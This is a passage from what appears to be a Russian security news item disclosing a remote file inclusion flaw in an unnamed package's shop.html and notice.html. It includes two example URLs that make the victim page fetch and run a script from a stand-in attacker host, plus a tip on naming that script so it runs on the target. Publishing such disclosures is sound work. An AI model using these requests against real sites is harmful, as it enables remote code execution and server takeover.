Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru

теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0)

[3971]

назад «  » вперед

аналогичные материалы Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22 Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57 Октябрьские обновления от MS // 14.10.09 00:19 Августовские обновления от MS // 11.08.09 22:40 Microsoft представила новый язык программирования // 11.05.09 21:10 Обход защиты памяти в Vista // 12.08.08 02:11 Эти страшные NULL-pointerы // 05.05.08 22:24

последние новостиBugTraq.Ru: последние новости В Microsoft Bing Chat пролезла вредоносная реклама // 30.09.23 15:05 Microsoft прикрывает Visual Studio for Mac // 30.08.23 19:17 Умер Кевин Митник // 20.07.23 15:57 Массовое внедрение вредоносного кода в драйверы Windows // 17.07.23 01:42 Переполнение буфера остается самой опасной уязвимостью // 30.06.23 23:32 50 лет Ethernet // 22.05.23 18:51 Уязвимость в KeePass // 21.05.23 19:20